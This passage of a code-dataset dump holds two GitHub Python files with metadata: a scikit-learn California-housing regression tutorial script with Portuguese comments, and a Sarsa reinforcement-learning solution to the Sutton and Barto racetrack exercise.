DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if 
tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef income_cat_proportions(data):\n return data[\"income_cat\"].value_counts() / len(data)\n\n\ndef display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n\nhousing = load_housing_data()\n\nprint(housing.head(30))\nprint(housing.info())\nprint(housing[\"ocean_proximity\"].value_counts())\nprint(housing.describe())\n\nhousing[\"income_cat\"] = np.ceil(housing[\"median_income\"] / 1.5)\nhousing[\"income_cat\"].where(housing[\"income_cat\"] < 5, 5.0, inplace=True)\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nprint(strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set))\nprint(housing[\"income_cat\"].value_counts() / len(housing))\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\ncompare_props = pd.DataFrame({\n \"Overall\": income_cat_proportions(housing),\n \"Stratified\": income_cat_proportions(strat_test_set),\n \"Random\": income_cat_proportions(test_set),\n}).sort_index()\ncompare_props[\"Rand. %error\"] = 100 * compare_props[\"Random\"] / compare_props[\"Overall\"] - 100\ncompare_props[\"Strat. 
%error\"] = 100 * compare_props[\"Stratified\"] / compare_props[\"Overall\"] - 100\nprint(compare_props)\n\nfor set_ in (strat_train_set, strat_test_set):\n set_.drop([\"income_cat\"], axis=1, inplace=True)\n\n# visualizando os dados\n\nhousing = strat_train_set.copy()\n\n# california_img = mpimg.imread(PROJECT_ROOT_DIR + '/images/end_to_end_project/california.png')\n# ax = housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", figsize=(10,7),\n# s=housing['population']/100, label=\"Population\",\n# c=\"median_house_value\", cmap=plt.get_cmap(\"jet\"),\n# colorbar=False, alpha=0.4,\n# )\n# plt.imshow(california_img, extent=[-124.55, -113.80, 32.45, 42.05], alpha=0.5,\n# cmap=plt.get_cmap(\"jet\"))\n# plt.ylabel(\"Latitude\", fontsize=14)\n# plt.xlabel(\"Longitude\", fontsize=14)\n#\n# prices = housing[\"median_house_value\"]\n# tick_values = np.linspace(prices.min(), prices.max(), 11)\n# cbar = plt.colorbar()\n# cbar.ax.set_yticklabels([\"$%dk\"%(round(v/1000)) for v in tick_values], fontsize=14)\n# cbar.set_label('Median House Value', fontsize=16)\n#\n# plt.legend(fontsize=16)\n# save_fig(\"california_housing_prices_plot\")\n# plt.show()\n\ncorr_matrix = housing.corr()\nprint(corr_matrix[\"median_house_value\"].sort_values(ascending=False))\n\n# attributes = [\"median_house_value\", \"median_income\", \"total_rooms\",\n# \"housing_median_age\"]\n# scatter_matrix(housing[attributes], figsize=(12, 8))\n# save_fig(\"scatter_matrix_plot\")\n\nhousing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\n\ncorr_matrix = housing.corr()\ncorr_matrix[\"median_house_value\"].sort_values(ascending=False)\n\n# preparando para machine learning\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n\nhousing.dropna(subset=[\"total_bedrooms\"]) # remove as linhas que contêm valores nulos\nhousing.drop(\"total_bedrooms\", axis=1) # remove a coluna inteira\nmedian = housing[\"total_bedrooms\"].median()\nhousing[\"total_bedrooms\"].fillna(median) # substitui os valores nulos pela mediana\n\nimputer = Imputer(strategy=\"median\")\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # remover atributos não numéricos\nimputer.fit(housing_num) # usar sklearn para completar os valores nulos com a mediana\nprint(imputer.statistics_)\n\nX = imputer.transform(housing_num)\nhousing_tr = pd.DataFrame(X, columns=housing_num.columns)\n\nencoder = LabelEncoder() # pŕoblema que os algoritmos de ml acham que categorias mais próximas são similares\nhousing_cat = housing[\"ocean_proximity\"]\nhousing_cat_encoded = encoder.fit_transform(housing_cat)\nprint(housing_cat_encoded)\n\nencoder = OneHotEncoder()\nhousing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))\nprint(housing_cat_1hot)\n\nencoder = LabelBinarizer()\nhousing_cat_1hot = encoder.fit_transform(housing_cat)\nprint(housing_cat_1hot)\n\nattr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\nhousing_extra_attribs = attr_adder.transform(housing.values)\n\nhousing_extra_attribs = pd.DataFrame(\n housing_extra_attribs,\n columns=list(housing.columns)+[\"rooms_per_household\", \"population_per_household\"])\nprint(housing_extra_attribs.head())\n\nnum_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n # 
('selector', DataFrameSelector(num_attribs)),\n ('imputer', Imputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\n# cat_pipeline = Pipeline([\n# ('selector', DataFrameSelector(cat_attribs)),\n# ('cat_encoder', OneHotEncoder()),\n# ])\n\nfull_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n ])\n\nhousing_prepared = full_pipeline.fit_transform(housing)\nprint(housing_prepared)\nprint(housing_prepared.shape)\n\n# Trainando o modelo\nlin_reg = LinearRegression()\nlin_reg.fit(housing_prepared, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nsome_data_prepared = full_pipeline.transform(some_data)\nprint(\"Predictions:\\t\", lin_reg.predict(some_data_prepared))\nprint(\"Labels:\\t\\t\", list(some_labels))\n\nhousing_predictions = lin_reg.predict(housing_prepared)\nlin_mse = mean_squared_error(housing_labels, housing_predictions)\nlin_rmse = np.sqrt(lin_mse)\nprint(lin_rmse)\n\ntree_reg = DecisionTreeRegressor()\ntree_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = tree_reg.predict(housing_prepared)\ntree_mse = mean_squared_error(housing_labels, housing_predictions)\ntree_rmse = np.sqrt(tree_mse)\nprint(tree_rmse)\n\nscores = cross_val_score(tree_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nforest_reg = RandomForestRegressor()\nforest_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = forest_reg.predict(housing_prepared)\nforest_mse = mean_squared_error(housing_labels, housing_predictions)\nforest_rmse = np.sqrt(forest_mse)\nprint(forest_rmse)\nscores = cross_val_score(forest_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nparam_grid = [\n {'n_estimators': [3, 10, 30, 40, 50], 'max_features': [2, 4, 5, 6, 7, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]}\n]\n\nforest_reg = RandomForestRegressor()\n\ngrid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error')\ngrid_search.fit(housing_prepared, housing_labels)\nprint(grid_search.best_params_)\nprint(grid_search.best_estimator_)\ncvres = grid_search.cv_results_\nfor mean_score, params in zip(cvres['mean_test_score'], cvres['params']):\n print(np.sqrt(-mean_score), params)\n\nfeature_importances = grid_search.best_estimator_.feature_importances_\nprint(feature_importances)\nextra_attribs = ['rooms_per_hhold', 'pop_per_hhold', 'bedrooms_per_rooms']\ncat_one_hot_attribs = list(encoder.classes_)\nattributes = num_attribs + extra_attribs + cat_one_hot_attribs\nsorted(zip(feature_importances))\n\nfinal_model = grid_search.best_estimator_\n\nX_test = strat_test_set.drop(\"median_house_value\", axis=1)\nY_test = strat_test_set[\"median_house_value\"].copy()\n\nX_test_prepared = full_pipeline.transform(X_test)\n\nfinal_predictions = final_model.predict(X_test_prepared)\nfinal_mse = mean_squared_error(Y_test, final_predictions)\nfinal_rmse = np.sqrt(final_mse)\ndisplay_scores(final_rmse)\n", "repo_name": "higornucci/classificacao-aulas", "sub_path": "handson/housing.py", "file_name": "housing.py", "file_ext": "py", "file_size_in_byte": 11301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", 
"line_number": 21, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 35, "usage_type": "name"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.c_", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "six.moves.urllib.request.urlretrieve", "line_number": 85, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 85, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 85, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 195, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": 
"sklearn.pipeline.Pipeline", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 221, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 223, "usage_type": "call"}, {"api_name": "future_encoders.ColumnTransformer", "line_number": 231, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 233, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 241, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 273, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 307, "usage_type": "call"}]} +{"seq_id": "34070809706", "text": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Sutton and Barto Racetrack: Sarsa\r\n# Exercise 5.8 from *Reinforcement Learning: An Introduction* by Sutton and Barto.\r\n# \r\n# This notebook applies the **Sarsa** algorithm from Chapter 6 to the Racetrack problem from Chapter 5. \r\n# \r\n# Python Notebook by Patrick Coady: [Learning Artificial Intelligence](https://learningai.io/)\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[2]:\r\n\r\n\r\nclass RaceTrack(object):\r\n \"\"\"\r\n RaceTrack object maintains and updates the race track \r\n state. Interaction with the class is through\r\n the take_action() method. The take_action() method returns\r\n a successor state and reward (i.e. s' and r)\r\n\r\n The class constructor is given a race course as a list of \r\n strings. The constructor loads the course and initializes \r\n the environment state.\r\n \"\"\"\r\n\r\n def __init__(self, course):\r\n \"\"\"\r\n Load race course, set any min or max limits in the \r\n environment (e.g. 
max speed), and set initial state.\r\n Initial state is random position on start line with \r\n velocity = (0, 0).\r\n\r\n Args:\r\n course: List of text strings used to construct\r\n race-track.\r\n '+': start line\r\n '-': finish line\r\n 'o': track\r\n 'X': wall\r\n\r\n Returns:\r\n self\r\n \"\"\"\r\n self.NOISE = 0.0\r\n self.EPS = 0.1 # epsilon-greedy coefficient\r\n self.MAX_VELOCITY = 4\r\n self.start_positions = []\r\n self.course = None\r\n self._load_course(course)\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def take_action(self, action):\r\n \"\"\"\r\n Take action, return state' and reward\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis.\r\n\r\n Returns:\r\n reward: integer\r\n \"\"\"\r\n\r\n self._update_velocity(action)\r\n self._update_position()\r\n if self.is_terminal_state():\r\n return 100.0\r\n\r\n return -1.0\r\n\r\n def get_state(self):\r\n \"\"\"Return 2-tuple: (position, velocity). Each is a 2D numpy array.\"\"\"\r\n return self.position.copy(), self.velocity.copy()\r\n\r\n def _update_velocity(self, action):\r\n \"\"\"\r\n Update x- and y-velocity. Clip at 0 and self.MAX_VELOCITY\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis. \r\n \"\"\"\r\n if np.random.rand() > self.NOISE:\r\n self.velocity += np.array(action, dtype=np.int16)\r\n self.velocity = np.minimum(self.velocity, self.MAX_VELOCITY)\r\n self.velocity = np.maximum(self.velocity, 0)\r\n\r\n def reset(self):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def _update_position(self):\r\n \"\"\"\r\n Update position based on present velocity. Check at fine time \r\n scale for wall or finish. If wall is hit, set position to random\r\n position at start line. If finish is reached, set position to \r\n first crossed point on finish line.\r\n \"\"\"\r\n for tstep in range(0, self.MAX_VELOCITY + 1):\r\n t = tstep / self.MAX_VELOCITY\r\n pos = self.position + np.round(self.velocity * t).astype(np.int16)\r\n if self._is_wall(pos):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n if self._is_finish(pos):\r\n self.position = pos\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n self.position = pos\r\n\r\n def _random_start_position(self):\r\n \"\"\"Set car to random position on start line\"\"\"\r\n self.position = np.array(random.choice(self.start_positions),\r\n dtype=np.int16)\r\n\r\n def _load_course(self, course):\r\n \"\"\"Load course. 
Internally represented as numpy array\"\"\"\r\n y_size, x_size = len(course), len(course[0])\r\n self.course = np.zeros((x_size, y_size), dtype=np.int16)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n point = course[y][x]\r\n if point == 'o':\r\n self.course[x, y] = 1\r\n elif point == '-':\r\n self.course[x, y] = 0\r\n elif point == '+':\r\n self.course[x, y] = 2\r\n elif point == 'W':\r\n self.course[x, y] = -1\r\n # flip left/right so (0,0) is in bottom-left corner\r\n self.course = np.fliplr(self.course)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n if self.course[x, y] == 0:\r\n self.start_positions.append((x, y))\r\n\r\n def _is_wall(self, pos):\r\n \"\"\"Return True is position is wall\"\"\"\r\n return self.course[pos[0], pos[1]] == -1\r\n\r\n def _is_finish(self, pos):\r\n \"\"\"Return True if position is finish line\"\"\"\r\n return self.course[pos[0], pos[1]] == 2\r\n\r\n def is_terminal_state(self):\r\n \"\"\"Return True at episode terminal state\"\"\"\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)\r\n\r\n def action_to_tuple(self, a):\r\n \"\"\"Convert integer action to 2-tuple: (ax, ay)\"\"\"\r\n ax = a // 3 - 1\r\n ay = a % 3 - 1\r\n\r\n return ax, ay\r\n\r\n def tuple_to_action(self, a):\r\n \"\"\"Convert 2-tuple to integer action: {0-8}\"\"\"\r\n return int((a[0] + 1) * 3 + a[1] + 1)\r\n\r\n def greedy_eps(self, Q):\r\n \"\"\"Based on state and Q values, return epsilon-greedy action\"\"\"\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a\r\n\r\n def srts(self,Q):\r\n pass\r\n\r\n\r\n def state_action(self, s, a):\r\n \"\"\"Build state-action tuple for indexing Q NumPy array\"\"\"\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n a_x, a_y = a[0] + 1, a[1] + 1\r\n s_a = (s_x, s_y, s_vx, s_vy, a_x, a_y)\r\n\r\n return s_a\r\n\r\n # In[3]:\r\n\r\n\r\n# Race Track from Sutton and Barto Figure 5.6\r\n\r\nbig_course = ['WWWWWWWWWWWWWWWWWW',\r\n 'WWWWooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'WooooooooooWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWW------WWWWWWWW']\r\n\r\n# Tiny course for debug\r\n\r\ntiny_course = ['WWWWWW',\r\n 'Woooo+',\r\n 'Woooo+',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'W--WWW', ]\r\n\r\n# In[4]:\r\n\r\n\r\n# Problem Initialization\r\n\r\ncourse = big_course\r\nx_size, y_size = len(course[0]), len(course)\r\n# Q[x_pos, y_pos, x_velocity, 
y-velocity, x-acceleration, y-acceleration]\r\nQ = np.zeros((x_size, y_size, 5, 5, 3, 3), dtype=np.float64)\r\nposition_map = np.zeros((x_size, y_size), dtype=np.float64) # track explored positions\r\n\r\nN = 2000 # num episodes\r\ngamma = 1.0\r\nalpha = 0.1\r\ntrack = RaceTrack(course)\r\n\r\n# Sarsa\r\n\r\nepochs = []\r\ncounts = []\r\ncount = 0\r\nfor e in range(N):\r\n if (e + 1) % 200 == 0: print('Episode {}'.format(e + 1))\r\n track.reset()\r\n s = track.get_state()\r\n a = track.greedy_eps(Q)\r\n\r\n while not track.is_terminal_state():\r\n position_map[s[0][0], s[0][1]] += 1\r\n count += 1\r\n r = track.take_action(a)\r\n s_prime = track.get_state()\r\n a_prime = track.greedy_eps(Q)\r\n s_a = track.state_action(s, a)\r\n s_a_prime = track.state_action(s_prime, a_prime)\r\n Q[s_a] = Q[s_a] + alpha * (r + gamma * Q[s_a_prime] - Q[s_a])\r\n s, a = s_prime, a_prime\r\n epochs.append(e)\r\n counts.append(count)\r\n\r\n\r\n\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nplt.plot(epochs, counts)\r\nplt.title('Simulation Steps vs. Episodes')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Total Simulation Steps')\r\nplt.show()\r\n\r\n# In[6]:\r\n\r\n\r\nprint('Heat map of position exploration:')\r\nplt.imshow(np.flipud(position_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n# In[7]:\r\n\r\n\r\n# Convert Q (action-values) to pi (policy)\r\npi = np.zeros((x_size, y_size, 5, 5), dtype=np.int16)\r\nfor idx in np.ndindex(x_size, y_size, 5, 5):\r\n a = np.argmax(Q[idx[0], idx[1], idx[2], idx[3], :, :])\r\n a = np.unravel_index(a, (3, 3))\r\n pi[idx] = track.tuple_to_action(a - np.array([1, 1]))\r\n\r\n# In[8]:\r\n\r\n\r\n# Run learned policy on test case\r\n\r\npos_map = np.zeros((x_size, y_size))\r\ntrack.reset()\r\nfor e in range(1000):\r\n s = track.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n pos_map[s_x, s_y] += 1 # exploration map\r\n act = track.action_to_tuple(pi[s_x, s_y, s_vx, s_vy])\r\n track.take_action(act)\r\n if track.is_terminal_state(): break\r\n\r\nprint('Sample trajectory on learned policy:')\r\npos_map = (pos_map > 0).astype(np.float32)\r\npos_map += track.course # overlay track course\r\nplt.imshow(np.flipud(pos_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n", "repo_name": "AnikHawk/AI-Lab", "sub_path": "Arc Consistency/SRTS.py", "file_name": "SRTS.py", "file_ext": "py", "file_size_in_byte": 10785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 113, "usage_type": "attribute"}, 
{"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 263, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.ndindex", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 341, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, 
